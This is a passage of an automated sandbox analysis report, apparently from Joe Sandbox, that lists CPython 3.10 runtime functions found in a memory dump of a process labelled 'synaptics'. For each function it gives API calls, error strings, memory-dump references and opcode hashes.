                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromStringUnicode_
                                                                                                                                                                                                      • String ID: Pntl
                                                                                                                                                                                                      • API String ID: 2818169177-2807539477
                                                                                                                                                                                                      • Opcode ID: f4a949807ef9c741592d808071f99f638323e489666bab1a151183d081239f86
                                                                                                                                                                                                      • Instruction ID: 30de015856668f12c8e7ad15aafa51888781da0a4760ccf3bbb93b0673d79d75
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4a949807ef9c741592d808071f99f638323e489666bab1a151183d081239f86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A03160759012019FCB45CF69CC90A9ABBF4AF45364F5442A8E824AB795D371ED81CBE0
                                                                                                                                                                                                      Function 6C4B3EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\tupleobject.c,000001F5), ref: 6C4B3FDA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\tupleobject.c, xrefs: 6C4B3FC9
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4B3FCE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\tupleobject.c
                                                                                                                                                                                                      • API String ID: 376477240-2871601777
                                                                                                                                                                                                      • Opcode ID: 51d9ebd8c96b6067110bf0264919d4ee6bb7ef1c6aba840c0bc14e5f0cf3375e
                                                                                                                                                                                                      • Instruction ID: 461e87028490e8b53164848f5a8d1db555a2c135629ac12d9d34363a1e515d33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51d9ebd8c96b6067110bf0264919d4ee6bb7ef1c6aba840c0bc14e5f0cf3375e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29316B727006158FCB04CE5ED480E56F3F6EB897597068569E909DBB11EA30E8418BD0
                                                                                                                                                                                                      Function 6C5B9960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C5B998E
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: memset.VCRUNTIME140()qXl,00000000,00000168,?,?), ref: 6C58DD44
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE5D
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE77
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: GetCurrentThreadId.KERNEL32 ref: 6C58DE97
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310 ref: 6C58DEA0
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(?,00000008), ref: 6C5B99F9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread_allocate_lock$CurrentInitMem_RuntimeState_ThreadWcsdupmemset
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 3101686629-3213955731
                                                                                                                                                                                                      • Opcode ID: c905a0fcab2f6a087b21c059f7525bb85f44250a3a94c55ee1655e8bbcadcad0
                                                                                                                                                                                                      • Instruction ID: 7e63e8f6f68f4142cdc2c44ce272137c57c83062aeee48dfc40ec228f8a15d18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c905a0fcab2f6a087b21c059f7525bb85f44250a3a94c55ee1655e8bbcadcad0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6631E631A0834447D710EF6D9C01B9AFFF4EB95319F10932EEC5896650F771A4998F81
                                                                                                                                                                                                      Function 6C468E00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000), ref: 6C468EA8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyCapsule_GetPointer called with incorrect name, xrefs: 6C468E6F
                                                                                                                                                                                                      • PyCapsule_GetPointer called with invalid PyCapsule object, xrefs: 6C468E84
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object
                                                                                                                                                                                                      • String ID: PyCapsule_GetPointer called with incorrect name$PyCapsule_GetPointer called with invalid PyCapsule object
                                                                                                                                                                                                      • API String ID: 1617383179-428115879
                                                                                                                                                                                                      • Opcode ID: fe38bcc9ee8b74e9c42cc9f304cadf152ec115c7e4fb0970ef6ff04be1b062f6
                                                                                                                                                                                                      • Instruction ID: 4c73b7d5bb26393740955ee67a039fd52e20aaf94d8e914413c82b2ff103b221
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe38bcc9ee8b74e9c42cc9f304cadf152ec115c7e4fb0970ef6ff04be1b062f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA21D762B051015BD700CE67DC91F6237A69B936A9F188276DD18CFF99EA23DC05C391
                                                                                                                                                                                                      Function 6C4EE8B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?,00000000,?,?,6C476DF8,00000000,00000000,?,00000000,?,?,?,?,00000001), ref: 6C4EE8ED
                                                                                                                                                                                                        • Part of subcall function 6C4D1F70: _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • PyDict_SetDefault.PYTHON310(?,?,?,00000000,?,?,6C476DF8,00000000,00000000,?,00000000,?,?,?,?,00000001), ref: 6C4EE944
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DefaultDict_Err_MemoryReadyUnicode_
                                                                                                                                                                                                      • String ID: @Btl
                                                                                                                                                                                                      • API String ID: 273723096-3323547406
                                                                                                                                                                                                      • Opcode ID: 04bbd667a19c1c778b340200108719aa91d50e8726905c2169b8adb34e7b20cb
                                                                                                                                                                                                      • Instruction ID: 5ae03597fdde7e83551e43da996664573cc56268531a643b58b8992bfcc262ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04bbd667a19c1c778b340200108719aa91d50e8726905c2169b8adb34e7b20cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D021A431604A198BC750CF2DD880ED57BF4EB4A37B725462AE855CBBA1D331E446CBD1
                                                                                                                                                                                                      Function 6C579CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_PreInitializeFromConfig.PYTHON310(?,?,00000000,?,?,?,?,?,6C579D81,?,?,cannot decode string), ref: 6C579CB1
                                                                                                                                                                                                        • Part of subcall function 6C588900: _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58893D
                                                                                                                                                                                                      • Py_DecodeLocale.PYTHON310(?,?,?,?,?,?,?,?,6C579D81,?,?,cannot decode string), ref: 6C579CD9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConfigDecodeFromInitInitializeLocaleRuntimeState_
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 645537010-3213955731
                                                                                                                                                                                                      • Opcode ID: c95c2df3affdca261bc651992b975964252291a35b298a289b0db5a23c6f4894
                                                                                                                                                                                                      • Instruction ID: 1c0335ea78aef8af504126aad321ee32882891a18bbee5330358fcbe934af3c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c95c2df3affdca261bc651992b975964252291a35b298a289b0db5a23c6f4894
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4821A271A002089FCB209F59EC05B99BBF8EF85329F15C296EC0C8B761D7759894CBE0
                                                                                                                                                                                                      Function 6C468CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C468D27
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?), ref: 6C468D52
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyCapsule_New called with null pointer, xrefs: 6C468D12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ObjectObject_
                                                                                                                                                                                                      • String ID: PyCapsule_New called with null pointer
                                                                                                                                                                                                      • API String ID: 2739022225-2436675595
                                                                                                                                                                                                      • Opcode ID: e954e9153e1d705e0c277e950dd9ea9101d3b05311e98926b154914b5acd5e2b
                                                                                                                                                                                                      • Instruction ID: 91eeb6ce3fa64347fc4a336bf87d3bd1db179696f57f7d5ce0e01e4625623d10
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e954e9153e1d705e0c277e950dd9ea9101d3b05311e98926b154914b5acd5e2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9112C727042085BD710CE9EEC41F9673D8DB55239F1442BAED1CCBB81E662EC0287E1
                                                                                                                                                                                                      Function 6C48BE20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\iterobject.c,00000014), ref: 6C48BEE8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C48BEDC
                                                                                                                                                                                                      • D:\a\1\s\Objects\iterobject.c, xrefs: 6C48BED7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\iterobject.c
                                                                                                                                                                                                      • API String ID: 376477240-3958289049
                                                                                                                                                                                                      • Opcode ID: f0b290e3fca066d108ee5786373b18f15b6dfc3cead91e0dab14bd29380efeb2
                                                                                                                                                                                                      • Instruction ID: 526bffe73a2660568c2e514f5336ea2bb3fcafa8a046a5f52813c6d3ea3e95d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0b290e3fca066d108ee5786373b18f15b6dfc3cead91e0dab14bd29380efeb2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F218C717022088FD710DF19C801F66B7F5EB85319F18866AE9288BB62D7B4E854CFD0
                                                                                                                                                                                                      Function 6C583D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C583D5A
                                                                                                                                                                                                      • PyModule_AddObjectRef.PYTHON310(?,?,00000000), ref: 6C583D8F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Module_ObjectString
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 1467791308-2786935005
                                                                                                                                                                                                      • Opcode ID: 5af76ffb9b53c3b845c7586214c22dc87e9c2d771edb70b24e8e7df603a3f50e
                                                                                                                                                                                                      • Instruction ID: 1c2bdb8ff92143fd12ecd13d6529d84a498f564888f1c511a36f9fafafababc4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5af76ffb9b53c3b845c7586214c22dc87e9c2d771edb70b24e8e7df603a3f50e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E016B76F0612013C620492DAC02AC67799CBC23B9F144375EC388BBC0EE226C1682D1
                                                                                                                                                                                                      Function 6C469C90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\classobject.c,00000066), ref: 6C469CB7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C469CAB
                                                                                                                                                                                                      • D:\a\1\s\Objects\classobject.c, xrefs: 6C469CA6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
